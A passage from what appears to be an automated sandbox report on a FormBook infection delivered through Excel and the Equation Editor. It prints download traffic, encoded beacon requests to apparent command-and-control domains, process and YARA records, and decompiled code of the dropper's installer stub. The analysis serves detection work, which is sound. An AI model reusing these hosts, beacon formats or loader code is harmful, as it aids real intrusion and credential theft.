                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Host: algreenstdykeghestqw.dns.army
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389307976 CET3INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:26:00 GMT
                                                                                                                                                                                                        Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                                                                        Last-Modified: Tue, 23 Feb 2021 07:55:07 GMT
                                                                                                                                                                                                        ETag: "35218-5bbfc3ca9d9e8"
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 217624
                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 104.21.61.250 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:27:14.847470045 CET | 233 | OUT | GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1
Host: www.fashionwatchesstore.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 10:27:15.275433064 CET | 234 | IN | HTTP/1.1 401.1 Unauthorized
Date: Tue, 23 Feb 2021 09:27:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d3952bf084d888117c82a1d2dca71090e1614072434; expires=Thu, 25-Mar-21 09:27:14 GMT; path=/; domain=.fashionwatchesstore.com; HttpOnly; SameSite=Lax
CF-Cache-Status: DYNAMIC
cf-request-id: 086fcfe8bf00004e138929f000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1hpP4drIbnTPup7R%2BneVNCvn3ziHhYEXy7Bfs5HWyLnKg3AuVrK25htuzaIQ5yjDZzGHpeOeu%2BasfhUsOTaLLpPnHmavrF9L7rSfcWPR4kjZaxJXalXOfrRBmnE%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 625fe8edf9f54e13-FRA
Data Ascii: 65c<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>/</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no"><STYLE type="text/css"> *{margin:0px auto;} BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE><script type="text/javascript" src="/tj.js?3"></script></HEAD><BODY><
Feb 23, 2021 10:27:15.275492907 CET | 235 | IN | Data Ascii: TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li>
Feb 23, 2021 10:27:15.275523901 CET | 235 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49170 | 103.251.44.218 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:27:20.771933079 CET | 236 | OUT | GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1
Host: www.athara-kiano.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 10:27:21.240080118 CET | 236 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g
Content-Length: 0
Date: Tue, 23 Feb 2021 09:27:21 GMT
Server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49171 | 191.96.163.202 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:27:26.555535078 CET | 237 | OUT | GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1
Host: www.overseaexpert.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 10:27:26.751426935 CET | 238 | IN | HTTP/1.1 404 Not Found
Date: Tue, 23 Feb 2021 09:27:26 GMT
Server: Apache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>


                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:25:50
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                        Imagebase:0x13f880000
                                                                                                                                                                                                        File size:27641504 bytes
                                                                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:11
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:543304 bytes
                                                                                                                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:14
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:217624 bytes
                                                                                                                                                                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 36%, ReversingLabs
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:15
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:217624 bytes
                                                                                                                                                                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:18
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                        Imagebase:0xffca0000
                                                                                                                                                                                                        File size:3229696 bytes
                                                                                                                                                                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:33
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                                                        File size:27136 bytes
                                                                                                                                                                                                        MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:37
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x49d30000
                                                                                                                                                                                                        File size:302592 bytes
                                                                                                                                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			_entry_() {
                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                          				intOrPtr* _t47;
                                                                                                                                                                                                          				CHAR* _t51;
                                                                                                                                                                                                          				char* _t53;
                                                                                                                                                                                                          				CHAR* _t55;
                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                          				int _t63;
                                                                                                                                                                                                          				int _t66;
                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                          				int _t68;
                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                          				void* _t113;
                                                                                                                                                                                                          				void* _t118;
                                                                                                                                                                                                          				intOrPtr* _t119;
                                                                                                                                                                                                          				char _t122;
                                                                                                                                                                                                          				signed int _t141;
                                                                                                                                                                                                          				signed int _t142;
                                                                                                                                                                                                          				int _t150;
                                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                                          				intOrPtr* _t153;
                                                                                                                                                                                                          				CHAR* _t156;
                                                                                                                                                                                                          				CHAR* _t157;
                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                          				char* _t160;
                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                          				void* _t164;
                                                                                                                                                                                                          				char _t189;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				 *(_t164 + 0x18) = 0;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                                                          				 *(_t164 + 0x20) = 0;
                                                                                                                                                                                                          				 *(_t164 + 0x14) = 0x20;
                                                                                                                                                                                                          				SetErrorMode(0x8001); // executed
                                                                                                                                                                                                          				_t42 = GetVersion() & 0xbfffffff;
                                                                                                                                                                                                          				 *0x42f44c = _t42;
                                                                                                                                                                                                          				if(_t42 != 6) {
                                                                                                                                                                                                          					_t119 = E00406656(0);
                                                                                                                                                                                                          					if(_t119 != 0) {
                                                                                                                                                                                                          						 *_t119(0xc00);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t156 = "UXTHEME";
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					E004065E8(_t156); // executed
                                                                                                                                                                                                          					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                                                                                                                                                                          				} while ( *_t156 != 0);
                                                                                                                                                                                                          				E00406656(0xb);
                                                                                                                                                                                                          				 *0x42f444 = E00406656(9);
                                                                                                                                                                                                          				_t47 = E00406656(7);
                                                                                                                                                                                                          				if(_t47 != 0) {
                                                                                                                                                                                                          					_t47 =  *_t47(0x1e);
                                                                                                                                                                                                          					if(_t47 != 0) {
                                                                                                                                                                                                          						 *0x42f44f =  *0x42f44f | 0x00000040;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				__imp__#17(_t159);
                                                                                                                                                                                                          				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                          				 *0x42f518 = _t47;
                                                                                                                                                                                                          				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
                                                                                                                                                                                                          				E0040624D("Setup Setup", "NSIS Error");
                                                                                                                                                                                                          				_t51 = GetCommandLineA();
                                                                                                                                                                                                          				_t160 = "\"C:\\Users\\Public\\vbc.exe\" ";
                                                                                                                                                                                                          				E0040624D(_t160, _t51);
                                                                                                                                                                                                          				 *0x42f440 = 0x400000;
                                                                                                                                                                                                          				_t53 = _t160;
                                                                                                                                                                                                          				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
                                                                                                                                                                                                          					 *(_t164 + 0x14) = 0x22;
                                                                                                                                                                                                          					_t53 =  &M00435001;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
                                                                                                                                                                                                          				 *(_t164 + 0x1c) = _t55;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t122 =  *_t55;
                                                                                                                                                                                                          					_t172 = _t122;
                                                                                                                                                                                                          					if(_t122 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t122 - 0x20;
                                                                                                                                                                                                          					if(_t122 != 0x20) {
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						__eflags =  *_t55 - 0x22;
                                                                                                                                                                                                          						 *(_t164 + 0x14) = 0x20;
                                                                                                                                                                                                          						if( *_t55 == 0x22) {
                                                                                                                                                                                                          							_t55 =  &(_t55[1]);
                                                                                                                                                                                                          							__eflags = _t55;
                                                                                                                                                                                                          							 *(_t164 + 0x14) = 0x22;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags =  *_t55 - 0x2f;
                                                                                                                                                                                                          						if( *_t55 != 0x2f) {
                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                          							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
                                                                                                                                                                                                          							__eflags =  *_t55 - 0x22;
                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                          								_t55 =  &(_t55[1]);
                                                                                                                                                                                                          								__eflags = _t55;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t55 =  &(_t55[1]);
                                                                                                                                                                                                          							__eflags =  *_t55 - 0x53;
                                                                                                                                                                                                          							if( *_t55 != 0x53) {
                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                          								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                                                                                                                                                                                                          								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                                                                                                                                                                                                          									L24:
                                                                                                                                                                                                          									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                                                                                                                                                                                                          									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                                                                                                                                                                                                          										 *((char*)(_t55 - 2)) = 0;
                                                                                                                                                                                                          										__eflags =  &(_t55[2]);
                                                                                                                                                                                                          										E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp",  &(_t55[2]));
                                                                                                                                                                                                          										L30:
                                                                                                                                                                                                          										_t157 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                                                                                                                                                                          										GetTempPathA(0x400, _t157);
                                                                                                                                                                                                          										_t59 = E00403455(_t172);
                                                                                                                                                                                                          										_t173 = _t59;
                                                                                                                                                                                                          										if(_t59 != 0) {
                                                                                                                                                                                                          											L33:
                                                                                                                                                                                                          											DeleteFileA("1033"); // executed
                                                                                                                                                                                                          											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
                                                                                                                                                                                                          											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                                                                                                                                                                          											if(_t61 != 0) {
                                                                                                                                                                                                          												L43:
                                                                                                                                                                                                          												E0040396E();
                                                                                                                                                                                                          												__imp__OleUninitialize();
                                                                                                                                                                                                          												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                                                                                                                                                                          												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                                                                                                                                                                          													__eflags =  *0x42f4f4;
                                                                                                                                                                                                          													if( *0x42f4f4 == 0) {
                                                                                                                                                                                                          														L67:
                                                                                                                                                                                                          														_t63 =  *0x42f50c;
                                                                                                                                                                                                          														__eflags = _t63 - 0xffffffff;
                                                                                                                                                                                                          														if(_t63 != 0xffffffff) {
                                                                                                                                                                                                          															 *(_t164 + 0x14) = _t63;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														ExitProcess( *(_t164 + 0x14));
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                                                                                                                                                                          													__eflags = _t66;
                                                                                                                                                                                                          													_t150 = 2;
                                                                                                                                                                                                          													if(_t66 != 0) {
                                                                                                                                                                                                          														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                                                                                                                                                                          														 *(_t164 + 0x38) = 1;
                                                                                                                                                                                                          														 *(_t164 + 0x44) = _t150;
                                                                                                                                                                                                          														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t67 = E00406656(4);
                                                                                                                                                                                                          													__eflags = _t67;
                                                                                                                                                                                                          													if(_t67 == 0) {
                                                                                                                                                                                                          														L65:
                                                                                                                                                                                                          														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                                                                                                                                                                          														__eflags = _t68;
                                                                                                                                                                                                          														if(_t68 != 0) {
                                                                                                                                                                                                          															goto L67;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L66;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                                                                                                                                                                          														__eflags = _t70;
                                                                                                                                                                                                          														if(_t70 == 0) {
                                                                                                                                                                                                          															L66:
                                                                                                                                                                                                          															E0040140B(9);
                                                                                                                                                                                                          															goto L67;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L65;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                                                                                                                                                                          												ExitProcess(2);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											if( *0x42f460 == 0) {
                                                                                                                                                                                                          												L42:
                                                                                                                                                                                                          												 *0x42f50c =  *0x42f50c | 0xffffffff;
                                                                                                                                                                                                          												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
                                                                                                                                                                                                          												goto L43;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t153 = E00405C10(_t160, 0);
                                                                                                                                                                                                          											if(_t153 < _t160) {
                                                                                                                                                                                                          												L39:
                                                                                                                                                                                                          												_t182 = _t153 - _t160;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                                                                                                                                                                          												if(_t153 < _t160) {
                                                                                                                                                                                                          													_t151 = E004058D4(_t185);
                                                                                                                                                                                                          													lstrcatA(_t157, "~nsu");
                                                                                                                                                                                                          													if(_t151 != 0) {
                                                                                                                                                                                                          														lstrcatA(_t157, "A");
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													lstrcatA(_t157, ".tmp");
                                                                                                                                                                                                          													_t162 = "C:\\Users\\Public";
                                                                                                                                                                                                          													if(lstrcmpiA(_t157, "C:\\Users\\Public") != 0) {
                                                                                                                                                                                                          														_push(_t157);
                                                                                                                                                                                                          														if(_t151 == 0) {
                                                                                                                                                                                                          															E004058B7();
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															E0040583A();
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														SetCurrentDirectoryA(_t157);
                                                                                                                                                                                                          														_t189 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
                                                                                                                                                                                                          														if(_t189 == 0) {
                                                                                                                                                                                                          															E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t162);
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														E0040624D(0x430000,  *(_t164 + 0x1c));
                                                                                                                                                                                                          														_t137 = "A";
                                                                                                                                                                                                          														_t163 = 0x1a;
                                                                                                                                                                                                          														 *0x430400 = "A";
                                                                                                                                                                                                          														do {
                                                                                                                                                                                                          															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
                                                                                                                                                                                                          															DeleteFileA(0x429478);
                                                                                                                                                                                                          															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x429478, 1) != 0) {
                                                                                                                                                                                                          																E0040602C(_t137, 0x429478, 0);
                                                                                                                                                                                                          																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
                                                                                                                                                                                                          																_t94 = E004058EC(0x429478);
                                                                                                                                                                                                          																if(_t94 != 0) {
                                                                                                                                                                                                          																	CloseHandle(_t94);
                                                                                                                                                                                                          																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          															 *0x430400 =  *0x430400 + 1;
                                                                                                                                                                                                          															_t163 = _t163 - 1;
                                                                                                                                                                                                          														} while (_t163 != 0);
                                                                                                                                                                                                          														E0040602C(_t137, _t157, 0);
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L43;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												 *_t153 = 0;
                                                                                                                                                                                                          												_t154 = _t153 + 4;
                                                                                                                                                                                                          												if(E00405CD3(_t182, _t153 + 4) == 0) {
                                                                                                                                                                                                          													goto L43;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
                                                                                                                                                                                                          												E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t154);
                                                                                                                                                                                                          												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                                                                                                                                          												goto L42;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                                                                                                                                                                                                          											while( *_t153 != _t110) {
                                                                                                                                                                                                          												_t153 = _t153 - 1;
                                                                                                                                                                                                          												if(_t153 >= _t160) {
